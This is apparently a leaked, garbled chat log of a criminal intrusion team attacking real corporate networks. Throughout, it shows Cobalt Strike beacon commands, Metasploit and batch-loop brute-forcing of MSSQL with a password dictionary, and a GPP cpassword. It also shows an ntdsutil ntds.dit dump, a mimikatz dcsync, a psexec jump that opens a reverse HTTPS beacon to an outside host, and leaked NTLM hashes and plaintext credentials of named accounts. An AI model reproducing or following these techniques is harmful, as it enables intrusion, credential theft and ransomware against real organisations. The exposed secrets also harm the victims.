``okay, ad_user is shot through powerview fine, why when I shoot DomainPolicy I get ``wrong creeds you have here``?
everything is taken off without the credits, there won't be time to think about it in real objects - in real objects there won't be time to think about the fuck you're talking about
if i don't see guys writing 100 fucking times what to do and the timer goes to minutes, then it's a fucking analytical problem
if there are any questions for me - contact me directlyDiscord takes 5 minutes to postTeamLead1, TeamLead2 - let them all install Discord and share their screens
If they're so smart, they can show you "the goods face" in real time
and everything will be clear, if only because the standard polisy on the reset is 30 minutes, there will be no lockout
ok.
whatever
check it blindlycall it? ...... if you can go to ldap to remove hell through powerview we with grandfather as we check it out through powerview i wrote above that WE ARE NOT IN THE DOMAIN? is hell removed? we are sitting under a wpn it does not work out does it say anything?) net accounts /dombadpasswordcount oxxxxxxx
it's not Blindness from tnt telling the script what's the point of it? when the lockout is near it's skipped of course it's skipped of course
you use the script to check when autobrouting? fuck. is that even a question? we checked three passwords yesterday yes, we have no way to check the lockout policy of the domain
they will not fly into the lock if they check now? the second is to check the LA Credentials data on DIFFERENT groups of servers and APMs - all this is in the AD it makes sense to check it on all domain admins the first thing to do as it is a new pass and it is EXACTLY the technical can try to play with SID play but it is not sure .37 does not stick `` ``
[-] 10.1.4.4:445 - 10.1.4.4:445 - Failed: '.\Administrator:XhY?8WJSI',
``understood, didn't control user8 that it was brute-force,
how do we know which groups the machine is in?
if we're pulling that from the group policies?
changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"
```
this is a clear indication that this is a local user of some PC, and definitely not a service account, I understand that everyone wants to drink beer and have a rest, but let's stop the stupor and productively work off the crumbs of data that are available and not slushkullserver[ ](https://mediaeveryone.com/group/matches?msg=xaeRe2fBZd38i8oFH) . it's not even fucking funny anymore
why test this pass on 1433?
[-] 10.7.20.30:445 - 10.7.20.30:445 - Failed: '.\Administrator:XhY?8WJSI',
```
```
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\Administrator:XhY?8WJSI (Incorrect: )
[-] 10.5.19.37:1433 - 10.5.19.37:1433 - LOGIN FAILED: WORKSTATION\Administrator:XhY?8WJSI (Incorrect: )
``Guys, we're fucking sysadmins after all.
we're the ones who should understand the logic of group policies.
LA from GPO will be either on specific machines which are in specific groups or on network segments on sid? @tl1 make a correction, check the user and server machines belonging to specific sabnetamplet check the dk, skul and a couple of user pktak that may be everywhere know - this is from group policies
`<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator (built-in)" image="2" changed="2017-10-27 14:28:20" uid="{C36CFE81-5D6F-444F-981A-E4A0095AEB9F}"><Properties action="U" newName=""" fullName="" description="" cpassword="ZDNIgxXxcpyYuVsI1dItzBw3icVJ2LMHIv2RVOAw1mA" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" subAuthority="RID_ADMIN" userName="Administrator (built-in)"/></User>`LA where?password for LA XhY?WJSI[ ](https://mediaeveryone.com/group/matches?msg=icgaSNNqbnCtwaMpJ) This is the list of domain comps that the admins have in the balloon40 minutes to google this is longA how long ago did it work?)your task did anyone google it?)it's been 50 minutes)solved?"``
for /f %s in (srv.txt) do @ (echo %s)
```
there should be no error here)))) what do we have?
for /f %s in (srv.txt) do @ (echo %s)
``and so add () for the first loop?
for /f %s in (srv.txt) do @
    for /f %p in (pwd.txt) do @ (osql -S %s -U sa -P %p -Q "select @@servername" >> result.txt && echo %s:%p >> result.txt)
``Who wrote the batons? ``No, I won't tell you.
It's a mystery, I would pay attention to parentheses) but @tl2 did not tell me where the error is, just my assumption that I need to add parentheses somewhere else, all right? `%p` - a variable from the dictionary of passwords
do @ osql -S %s -U sa -P %p -Q "select @@servername" >> result.txt && echo %s:%p >> result.txt
``Where at the end of it you see 2 loops who can write batiks or code in any language but can make queries in the database under the accesses, it does not search itselfYou have 2 dictionaries - srv.txt, pwd.txt I do not think that it was necessary to explain the first one)`-Q matches.com ?[ ](https://mediaeveryone.com/group/matches?msg=NMnPWq9doKJzA9H6s) but if you think about it?
```
beacon> shell osql.exe -U sa
[*] Tasked beacon to run: osql.exe -U sa
[+] host called home, sent: 45 bytes
[+] received output:
Password:
``the question is what to run that everything should be in the same folder right? and just put osql.exe on the dedication and in the same folder with it srv.txt and pwd.txt will form the result.txt long?
[-] 10.10.1.41:61340 - 10.10.1.41:61340 - LOGIN FAILED: WORKSTATION\sa:PasswordA (Incorrect: )

[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:PasswordA (Incorrect: )
[-] 10.5.19.37:1433 - 10.5.19.37:1433 - LOGIN FAILED: WORKSTATION\sa:PasswordA (Incorrect: )

``PasswordA€'' looks like a broken symbol.
PasswordA - try ```.
[-] 10.10.1.41:61340 - 10.10.1.41:61340 - LOGIN FAILED: WORKSTATION\sa: (Incorrect: )
[-] 10.10.1.41:61340 - 10.10.1.41:61340 - LOGIN FAILED: WORKSTATION\sa:Password$ (Incorrect: )
[-] 10.10.1.41:61340 - 10.10.1.41:61340 - LOGIN FAILED: WORKSTATION\sa:PasswordA€ pw08 (Incorrect: )
[-] 10.10.1.41:61340 - 10.10.1.41:61340 - LOGIN FAILED: WORKSTATION\sa:PasswordA€ (Incorrect: )
[-] 10.10.1.41:61340 - 10.10.1.41:61340 - LOGIN FAILED: WORKSTATION\sa:pw08 (Incorrect: )
[-] 10.10.1.41:61340 - 10.10.1.41:61340 - LOGIN FAILED: WORKSTATION\sa:navproject123 (Incorrect: )
[-] 10.10.1.41:61340 - 10.10.1.41:61340 - LOGIN FAILED: WORKSTATION\sa:sapw08; (Incorrect: )
[-] 10.10.1.41:61340 - 10.10.1.41:61340 - LOGIN FAILED: WORKSTATION\sa:sapw08 (Incorrect: )
[-] 10.10.1.41:61340 - 10.10.1.41:61340 - LOGIN FAILED: WORKSTATION\sa:sapw12; (Incorrect: )
[-] 10.10.1.41:61340 - 10.10.1.41:61340 - LOGIN FAILED: WORKSTATION\sa:sapw12 (Incorrect: )
``Check another dictionary from @tl2 with the script.
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa: (Incorrect: )
[-] 10.5.19.37:1433 - 10.5.19.37:1433 - LOGIN FAILED: WORKSTATION\sa: (Incorrect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:Password$ (Incorrect: )
[-] 10.5.19.37:1433 - 10.5.19.37:1433 - LOGIN FAILED: WORKSTATION\sa:Password$ (Incorrect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:PasswordA€ pw08 (Incorrect: )
[-] 10.5.19.37:1433 - 10.5.19.37:1433 - LOGIN FAILED: WORKSTATION\sa:PasswordA€ pw08 (Incorrect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:PasswordA€ (Incorrect: )
[-] 10.5.19.37:1433 - 10.5.19.37:1433 - LOGIN FAILED: WORKSTATION\sa:PasswordA€ (Incorrect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:pw08 (Incorrect: )
[-] 10.5.19.37:1433 - 10.5.19.37:1433 - LOGIN FAILED: WORKSTATION\sa:pw08 (Incorrect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:navproject123 (Incorrect: )
[-] 10.5.19.37:1433 - 10.5.19.37:1433 - LOGIN FAILED: WORKSTATION\sa:navproject123 (Incorrect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:sapw08; (Incorrect: )
[-] 10.5.19.37:1433 - 10.5.19.37:1433 - LOGIN FAILED: WORKSTATION\sa:sapw08; (Incorrect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:sapw08 (Incorrect: )
[-] 10.5.19.37:1433 - 10.5.19.37:1433 - LOGIN FAILED: WORKSTATION\sa:sapw08 (Incorrect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:sapw12; (Incorrect: )
[-] 10.5.19.37:1433 - 10.5.19.37:1433 - LOGIN FAILED: WORKSTATION\sa:sapw12; (Incorrect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:sapw12 (Incorrect: )
[-] 10.5.19.37:1433 - 10.5.19.37:1433 - LOGIN FAILED: WORKSTATION\sa:sapw12 (Incorrect: )

``Don't forget this for the brute force, the custom skull port means a different thing``.
beacon> portscan 10.10.1.41 61340
[*] Tasked beacon to scan ports 61340 on 10.10.1.41
[+] host called home, sent: 93245 bytes
[+] received output:
(ICMP) Target '10.10.1.41' is alive. [read 8 bytes]

[+] received output:
10.10.1.41:61340
Scanner module is complete
``The second one is closed Check 61340 command + output
beacon> portscan 10.10.1.41
[*] Tasked beacon to scan ports 1-1024,3389,5900-6000 on 10.10.1.41
[+] host called home, sent: 93245 bytes
[+] received output:
(ICMP) Target '10.10.1.41' is alive. [read 8 bytes]
10.10.1.41:5985
10.10.1.41:3389
10.10.1.41:443
10.10.1.41:139
10.10.1.41:135
10.10.1.41:80
10.10.1.41:445
```
```
beacon> portscan 10.7.18.36
[*] Tasked beacon to scan ports 1-1024,3389,5900-6000 on 10.7.18.36
[+] host called home, sent: 93245 bytes
[+] received output:
(ICMP) Target '10.7.18.36' is alive. [read 8 bytes]
10.7.18.36:5985
10.7.18.36:3389
10.7.18.36:135
10.7.18.36:80
``First and last check what portPassword: navproject123``.
Pinging FORTICLIENTEMS.matches.com [10.10.1.41] with 32 bytes of data:
Reply from 10.10.1.41: bytes=32 time=110ms TTL=121
Reply from 10.10.1.41: bytes=32 time=181ms TTL=121
Reply from 10.10.1.41: bytes=32 time=300ms TTL=121
Reply from 10.10.1.41: bytes=32 time=279ms TTL=121

Ping statistics for 10.10.1.41:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 110ms, Maximum = 300ms, Average = 217ms



Pinging EC2AMAZ-U49LCLF.matches.com [10.1.4.4] with 32 bytes of data:
Reply from 10.1.4.4: bytes=32 time=112ms TTL=121
Reply from 10.1.4.4: bytes=32 time=112ms TTL=121
Reply from 10.1.4.4: bytes=32 time=202ms TTL=121
Reply from 10.1.4.4: bytes=32 time=180ms TTL=121

Ping statistics for 10.1.4.4:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 112ms, Maximum = 202ms, Average = 151ms




Pinging AWS-VPBCSQL03.matches.com [10.5.19.37] with 32 bytes of data:
Reply from 10.5.19.37: bytes=32 time=186ms TTL=121
Reply from 10.5.19.37: bytes=32 time=122ms TTL=121
Reply from 10.5.19.37: bytes=32 time=148ms TTL=121
Reply from 10.5.19.37: bytes=32 time=122ms TTL=121

Ping statistics for 10.5.19.37:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 122ms, Maximum = 186ms, Average = 144ms



Pinging AWS-VTBIMSTRI03.matches.com [10.7.18.36] with 32 bytes of data:
Reply from 10.7.18.36: bytes=32 time=136ms TTL=121
Reply from 10.7.18.36: bytes=32 time=122ms TTL=121
Reply from 10.7.18.36: bytes=32 time=137ms TTL=121
Reply from 10.7.18.36: bytes=32 time=122ms TTL=121

Ping statistics for 10.7.18.36:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 122ms, Maximum = 137ms, Average = 129ms
```

```
(ICMP) Target '10.10.1.41' is alive. [read 8 bytes]

[+] received output:
Scanner module is complete


(ICMP) Target '10.1.4.4' is alive. [read 8 bytes]
10.1.4.4:1433
Scanner module is complete


(ICMP) Target '10.5.19.37' is alive. [read 8 bytes]
10.5.19.37:1433
Scanner module is complete


[+] received output:
(ICMP) Target '10.7.18.36' is alive. [read 8 bytes]

[+] received output:
Scanner module is complete
````MSSQLSvc.matches.com [204.74.99.100]`CREATE LOGIN [Abby] WITH PASSWORD=N'abbyabby', DEFAULT_DATABASE=[master],[ ](https://mediaeveryone.com/group/matches?msg=WHrvRc9wXZ5vuZfsf) yes "SysConnStr"="company=Carpetright UK;server=CSONAVQA01;dbname=CSONAVQA01;user=repl_ho;passwd=admin;|fin|ndbcs@370 "skul ports by the way are listed in the AD again - read the conclusion you like to be more secretive and unnecessarily drop files on the disk, but it makes a lot of noise traffic) for the future - when you scan for anything, check the port you need to check is hardly there dhcp certainlyotping skul again?```
Unable to Connect: )
``at least I saw myself why didn't you scan it?
(ICMP) Target '10.1.4.4' is alive. [read 8 bytes]
10.1.4.4:1433
Scanner module is complete
```

```
(ICMP) Target '10.7.18.36' is alive. [read 8 bytes]

[+] received output:
Scanner module is complete
```

```
beacon> portscan 10.7.19.25 1433
[*] Tasked beacon to scan ports 1433 on 10.7.19.25
[+] host called home, sent: 93245 bytes
[+] received output:
Scanner module is complete
``And more, please send me the port scans to all 3 servers, it was not in the rockyou?
for /f %s in (srv.txt) do @ (for /f %p in (pwd.txt) do @ osql -S %s -U sa -P %p -Q "select @@servername" >> result.txt && echo %s:%p >> result.txt)
```
something like this is possible
but there is a mistake somewhere in this command ;- )The dumbest thing on the skulbrut is this above ```
1
123
1234
12345
123456
1234567
12345678
123456789
1234567890
sa
sasa
sqlsa
sqladmin
sqladmin1
sa1
s@dmin
P455w0rd
p455w0rd
p455word
p455wOrd
P455word
P455wOrd
P4ssw0rd
p4ssw0rd
p4sSw0rd
p4Ssw0rd
P4ssword
p4ssword
p4sswOrd
P4sswOrd
P@55w0rd
p@55w0rd
p@55word
P@55word
p@55wOrd
P@55wOrd
pa55w0rd
pa55w0rd
pa55word
Pa55word
Passw0rd
passw0rd
PasswOrd
Password
password
PaSsWoRd
PASSword
PASSWORD
passwOrd
pa$w0rd
pa$word
P@ssw0rd
p@ssw0rd
p@sSw0rd
p@Ssw0rd
P@ssword
p@ssword
p@sswOrd
P@sswOrd
P@$w0rd
p@$w0rd
p@$$word
p@$wOrd
P@$word
P@$wOrd
P455w0rd1
p455w0rd1
p455word1
p455wOrd1
P455word1
P455wOrd1
P4ssw0rd1
p4ssw0rd1
p4sSw0rd1
p4Ssw0rd1
P4ssword1
p4ssword1
p4sswOrd1
P4sswOrd1
P@55w0rd1
p@55w0rd1
p@55word1
P@55word1
p@55wOrd1
P@55wOrd1
pa55w0rd1
Pa55w0rd1
pa55word1
Pa55word1
Passw0rd1
passw0rd1
PasswOrd1
Password1
password1
PaSsWoRd1
PASSword1
PASSWORD1
passwOrd1
pa$w0rd1
pa$word1
P@ssw0rd1
p@ssw0rd1
p@sSw0rd1
p@Ssw0rd1
P@ssword1
p@ssword1
p@sswOrd1
P@sswOrd1
P@$w0rd1
p@$w0rd1
p@$word1
p@$wOrd1
P@$word1
P@$wOrd1
``````
[*] 10.7.19.25:1433 - 10.7.19.25:1433 - MSSQL - Starting authentication scanner.
[*] 10.7.18.36:1433 - 10.7.18.36:1433 - MSSQL - Starting authentication scanner.
[*] 10.1.4.4:1433 - 10.1.4.4:1433 - MSSQL - Starting authentication scanner.
[-] 10.1.4.4:1433 - Unable to parse encryption req during pre-login, this may not be a MSSQL server
[-] 10.7.19.25:1433 - 10.7.19.25:1433 - LOGIN FAILED: WORKSTATION\sa: (Unable to Connect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa: (Incorrect: )
[-] 10.7.18.36:1433 - 10.7.18.36:1433 - LOGIN FAILED: WORKSTATION\sa: (Unable to Connect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:sapw08; (Incorrect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:sapw12; (Incorrect: )
[*] Scanned 1 of 3 hosts (33% complete)
[*] Scanned 1 of 3 hosts (33% complete)
[*] Scanned 1 of 3 hosts (33% complete)
[-] 10.7.19.25:1433 - 10.7.19.25:1433 - LOGIN FAILED: WORKSTATION\sa:sapw08; (Unable to Connect: )
[-] 10.7.18.36:1433 - 10.7.18.36:1433 - LOGIN FAILED: WORKSTATION\sa:sapw08; (Unable to Connect: )
[-] 10.7.18.36:1433 - 10.7.18.36:1433 - LOGIN FAILED: WORKSTATION\sa:sapw12; (Unable to Connect: )
[-] 10.7.19.25:1433 - 10.7.19.25:1433 - LOGIN FAILED: WORKSTATION\sa:sapw12; (Unable to Connect: )
[*] Scanned 3 of 3 hosts (100% complete)
exploit -j
[*] Auxiliary module running as background job 1.
msf6 auxiliary(scanner/mssql/mssql_login) >
[*] 10.7.19.25:1433 - 10.7.19.25:1433 - MSSQL - Starting authentication scanner.
[*] 10.1.4.4:1433 - 10.1.4.4:1433 - MSSQL - Starting authentication scanner.
[*] 10.7.18.36:1433 - 10.7.18.36:1433 - MSSQL - Starting authentication scanner.
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa: (Incorrect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:sapw08 (Incorrect: )
[-] 10.7.18.36:1433 - 10.7.18.36:1433 - LOGIN FAILED: WORKSTATION\sa: (Unable to Connect: )
[-] 10.7.19.25:1433 - 10.7.19.25:1433 - LOGIN FAILED: WORKSTATION\sa: (Unable to Connect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:sapw12 (Incorrect:)
[*] Scanned 1 of 3 hosts (33% complete)
[*] Scanned 1 of 3 hosts (33% complete)
[*] Scanned 1 of 3 hosts (33% complete)
[-] 10.7.19.25:1433 - 10.7.19.25:1433 - LOGIN FAILED: WORKSTATION\sa:sapw08 (Unable to Connect: )
[-] 10.7.18.36:1433 - 10.7.18.36:1433 - LOGIN FAILED: WORKSTATION\sa:sapw08 (Unable to Connect: )
[-] 10.7.18.36:1433 - 10.7.18.36:1433 - LOGIN FAILED: WORKSTATION\sa:sapw12 (Unable to Connect: )
[-] 10.7.19.25:1433 - 10.7.19.25:1433 - LOGIN FAILED: WORKSTATION\sa:sapw12 (Unable to Connect: )
[*] Scanned 3 of 3 hosts (100% complete)
exploit -j
[*] Auxiliary module running as background job 2.
msf6 auxiliary(scanner/mssql/mssql_login)
[*] 10.7.19.25:1433 - 10.7.19.25:1433 - MSSQL - Starting authentication scanner.
[*] 10.1.4.4:1433 - 10.1.4.4:1433 - MSSQL - Starting authentication scanner.
[*] 10.7.18.36:1433 - 10.7.18.36:1433 - MSSQL - Starting authentication scanner.
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa: (Incorrect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:Password$ (Incorrect: )
[-] 10.7.19.25:1433 - 10.7.19.25:1433 - LOGIN FAILED: WORKSTATION\sa: (Unable to Connect: )
[-] 10.7.18.36:1433 - 10.7.18.36:1433 - LOGIN FAILED: WORKSTATION\sa: (Unable to Connect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:PasswordA€ pw08 (Incorrect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:PasswordA€ (Incorrect: )
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:pw08 (Incorrect:)
[*] Scanned 1 of 3 hosts (33% complete)
[*] Scanned 1 of 3 hosts (33% complete)
[*] Scanned 1 of 3 hosts (33% complete)
[-] 10.7.18.36:1433 - 10.7.18.36:1433 - LOGIN FAILED: WORKSTATION\sa:Password$ (Unable to Connect: )
[-] 10.7.19.25:1433 - 10.7.19.25:1433 - LOGIN FAILED: WORKSTATION\sa:Password$ (Unable to Connect: )
[-] 10.7.19.25:1433 - 10.7.19.25:1433 - LOGIN FAILED: WORKSTATION\sa:PasswordA€ pw08 (Unable to Connect: )
[-] 10.7.18.36:1433 - 10.7.18.36:1433 - LOGIN FAILED: WORKSTATION\sa:PasswordA€ pw08 (Unable to Connect: )
[*] Scanned 2 of 3 hosts (66% complete)
[*] Scanned 3 of 3 hosts (100% complete)


``All 3 servers? all failedPassword$
PasswordA€ pw08
PasswordA€
pw08I also recommend to build your own brute force dictionary for the future, which are not tied to domain, year and server namePassword$ PasswordA€ pw08setg Proxies socks4:104.238.205.128:2282checkablethere is an excellent)in hashes look[ ](https://mediaeveryone.com/group/matches?msg=Af9FsrNjnoLdqp8dG) where is it from?[ ](https://mediaeveryone.com/group/matches?msg=Ht6pTTvpaofN7oE4B) .sa sapw08;@user1 hasn't removed the hash?+sleep + highlighted in yellowSleep good morning and you can all go home and dump that available@user3 session in the coba highlight where the file I'll take samsession in slipriyou get I in the coba uploadsSanja sleep you in the coba uploads? Only you at work? I mean, my productivity will be 50% less because I get up at 8 in the morning. And it will be good if only mine.You know what it would be if grandma had a bolt.But if I had archived ...In 4 hours already get up)I know the smaller the date comes out - the better = )
saiglobal.com\adm.bisfra0 aad3b435b51404eeaad3b435b51404ee:6778ead5a63d0e8da0a2235147af85a0
saiglobal.com\adm.brodan0 aad3b435b51404eeaad3b435b51404ee:06290576382001cd1da4c942e9fa0ca6
saiglobal.com\adm.brodav1 aad3b435b51404eeaad3b435b51404ee:4f1ef28113c7375b22d3f31bd294fa4e
saiglobal.com\adm.damben0 aad3b435b51404eeaad3b435b51404ee:dd9507d8ad5d23af29f99fdbe979d72a
saiglobal.com\adm.evamar1 aad3b435b51404eeaad3b435b51404ee:65a8bca59e4205fc94ed31e11f78d4ac
saiglobal.com\adm.kalnic0 aad3b435b51404eeaad3b435b51404ee:d9c4c5a3dca649913994767d6276b9f9
saiglobal.com\adm.turime0 aad3b435b51404eeaad3b435b51404ee:2a0974987cad16892cf57c3f3646e1ea
saig.frd.global\svc.sccmcliinst aad3b435b51404eeaad3b435b51404ee:aa9249f57aba289658fde8afe795fd67

``We are in no hurry ;`` Then you delete everything after you drop1 eh file into the system, archive it and compress it 577 times in the internet)) there is no archiver in the archive? brr, it's about half an hour for 100mdump waiting to load e still in the work? no@user3 finished with the dump?golden words, i wholeheartedly support:thinking:let's take it into account and do it differently in the future:face_with_monocle:but in the creds it was necessary to put exactly "short" variant so it happened because yes and EA were needed before getting the session on trustee originally wanted to do so, but then I thought "why the fuck then to get them through addind" and decided that "but suddenly it is necessary" and that's how it is, and here's the result.just like the list of dk, ea, ok future, I see you from ad users delivered yes and other things, next time in creds.txt just output net group "domain admins" and all)if anything you can from my he said that he has everything sortedMisha leave c360? well for all that worked today report, Misha finalized c360[ ](https://mediaeveryone.com/group/saiglobal-com?msg=35agEhdwKYvDpwkSZ) and why 3 domains inside?[ ](https://mediaeveryone.com/group/saiglobal-com?msg=vtPCrjfCF2HwvMfKx) nobody read)well in general here and trust was a chore, the next time will be much faster)and all the rest is a matter of time, routine)the hardest was to get into the trustda I also got tired) let's finish, there is not much left) How nice that you with us to win) tomorrow a hard day sleep not, already half an hour to finishNow all night work?do do, now, forgot@user9 where are EA, DA, LA? kerbs separately really kerbs - kerb, the rest hashes[ ](https://mediaeveryone.com/group/saiglobal-com?msg=tm3NpqFRoaH3MFnyd) kerbs - dcsync
hashes - kerb? have not arrived yet? i already passed the session so how are you doing with the others? tomorrow from 3:30? +5 servers not distributed leave as is104.238.205.128aha, in the archive and take away in the report
beacon> run ntdsutil "ac in ntds" "ifm" "cr fu c:\windows\temp\abcd" q q
[*] Tasked beacon to run: ntdsutil "ac in ntds" "ifm" "cr fu c:\windows\temp\abcd" q q
[+] host called home, sent: 78 bytes
[+] received output:
ntdsutil: ac in ntds
Active instance set to "ntds".
ntdsutil: ifm
ifm: cr fu c:\windows\temp\abcd
Creating snapshot...
Snapshot set {30839d3a-489d-4c9e-9a4f-feea14764ebf} generated successfully.
Snapshot {402158c9-f22e-4d42-aaae-a52bf2e96cc8} mounted as C:\$SNAP_202010061119_VOLUMEC$\
Snapshot {402158c9-f22e-4d42-aaae-a52bf2e96cc8} is already mounted.
Initiating DEFRAGMENTATION mode...
     Source Database: C:\$SNAP_202010061119_VOLUMEC$\Windows\NTDS\ntds.dit
     Target Database: c:{windows\temp\abcd\Active Directory\ntds.dit

                  Defragmentation Status (% complete)

          0 10 20 30 40 50 60 70 80 90 100
          |----|----|----|----|----|----|----|----|----|----|
          ...................................................

Copying registry files...
Copying c:\windows\temp\abcd\registry\SYSTEM
Copying c:{windows\temp\abcd\registry\SECURITY
Snapshot {402158c9-f22e-4d42-aaae-a52bf2e96cc8} unmounted.
IFM media created successfully in c:\windows\temp\abcd
ifm: q
ntdsutil: q


I do not have a ping to you have not come to you jammed yes-is? +maybe you passcutted your coba mb) I have live from the login domain did not touch them when the data center jumped from saig.frd.global why then sag at the same time?i have not looked in different tries have i asked above445 port was open? accesses are valid?
beacon> shell tasklist /s 10.225.10.215 /v
[*] Tasked beacon to run: tasklist /s 10.225.10.215 /v
[+] host called home, sent: 59 bytes
``Is there a command you in winlogon? On any sysmos and allhost called home, sent 60 bytes, no output``.
[*] Tasked beacon to run mimikatz's @lsadump::dcsync /domain:legalco.local /all /csv command
[+] host called home, sent: 438858 bytes
[-] could not spawn C:\Windows\system32\mstsc.exe: 2
[-] Could not connect to pipe: 2
``What's the error?
Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

``taskillst doesn't give out processes where I put them strange that not all servers are in the servers group)`` what a strange group of servers...``

Servers:
	USATLHC-360FS1.datacenter.local
	USHDC1-360FS1.datacenter.local


	USHDC1-360MX2.datacenter.local
	USHDC1-360MX1.datacenter.local


	USHDC1-CSPFPS03.datacenter.local
	USHDC1-CSPFPS12.datacenter.local
	USHDC1-CSPFPS08.datacenter.local
	USHDC1-CSPFPS02.datacenter.local
	USHDC1-CSPFPS04.datacenter.local
	USHDC1-CSPFPS14.datacenter.local
	USHDC1-CSPFPS13.datacenter.local
	USHDC1-CSPFPS10.datacenter.local
	USHDC1-CSPFPS01.datacenter.local
	USHDC1-CSPFPS09.datacenter.local
	USHDC1-CSPFPS11.datacenter.local
	USHDC1-CSQFPS01.datacenter.local
	USHDC1-CSQFPS02.datacenter.local
	USHDC1-CSPFPS06.datacenter.local
	USHDC1-CSPFPS05.datacenter.local
	USHDC1-CSPFPS07.datacenter.local


	USHDC1-CSPMGW02.datacenter.local
	USHDC1-CSPMGW03.datacenter.local
	USHDC1-CSPMGW01.datacenter.local
	USHDC1-CSPMGW04.datacenter.local
``Could I log what...? I logged what I could, I logged f by domain login and hash immediately here, did you log YES and hashes? 2 minutesThat takes time``
ERROR: Logon failure: unknown user name or bad password
``First things first
``beacon> shell tasklist /s 10.195.23.13 /v
[*] Tasked beacon to run: tasklist /s 10.195.23.13 /v
[+] host called home, sent: 58 bytes
``Let's find a worker and get those admins' hashes off. Don't do that again, you'll get bogged down.
beacon> shell tasklist /s 10.195.23.14 /v
[*] Tasked beacon to run: tasklist /s 10.195.23.14 /v
[+] host called home, sent: 58 bytes
[+] received output:
ERROR: Logon failure: unknown user name or bad password.


``or are the creds invalid?``All 5 off rps?``Are there only 5@user3 many more left?``I'm not done,don't get the tosslists here inside the hell info,hashes,creds.txt and tdarhiv = name of domainsdump reports by domainsdoesn't finishdosort cars0.dead.zohocorpin.comd I remembered that we were just a wpn and couldn't find a wpn past? since the fall, it's been like 100 years since we have.... (do we not have sessions here? passyone here will be exactly about 20 + would be good. in tv there will be swampy yes? all the same as yesterday)
tv with what work7:space_invader:hihi Hi all, it's deaf here, no luck to get online, still under vpnom tell me how are things here?
 Remote Admin
```
That means he's an admin) AWS-VPDC01 10.5.20.30 ``
beacon> rev2self
[*] Tasked beacon to revert token
beacon> make_token .\administrator Tabiam*987
[*] Tasked beacon to create a token for .\administrator
beacon> jump psexec_psh AWS-VDDC01 https
[*] Tasked beacon to run windows/beacon_https/reverse_https (fixtom.com:443) on AWS-VDDC01 via Service Control Manager (PSH)
[+] host called home, sent: 214325 bytes
[+] Impersonated DATACENTER2\Administrator
[-] Could not open service control manager on AWS-VDDC01: 5
[-] Could not connect to pipe (\AWS-VDDC01\pipe\status_59f6): 1326
``These are the balls, so far, just these``.
\AWS-VPDC02/ADMIN$ - Remote Admin
\AWS-VPDC02/PC$ - Default share
\AWS-VPDC02/IPC$ - Remote IPC
\AWS-VPDC02$ - Logon server share
\\Logon server share
\\{\HO-VPDC01/ADMIN$ - Remote Admin
\\{\HO-VPDC01\C$ - Default share
\\Remote IPC$ - Remote IPC
\\Home server share - Logon server share
\\Logon server share (SYSVOL)
\AWS-VDDC01/ADMIN$ - Remote Admin
\\{\AWS-VDDC01\C$ - Default share
\AWS-VDDC01/IPC$ - Remote IPC
\\Logon server share (SNETLOGON)
\\Print$ - Printer Drivers
\\SYSVOL - Logon server share
\AWS-VPDC01/ADMIN$ - Remote Admin
\AWS-VPDC01\C$ - Default share
\AWS-VPDC01/IPC$ - Remote IPC
\\Logon server share (SNETLOGON)
\\Logon server share
\AWS-VPLODC01/ADMIN$ - Remote Admin
\AWS-VPLODC01$ - Default share
\AWS-VPLODC01/IPC$ - Remote IPC
\\Logon server share (SNETLOGON)
\AWS-VPLODC01\SYSVOL - Logon server share

``````
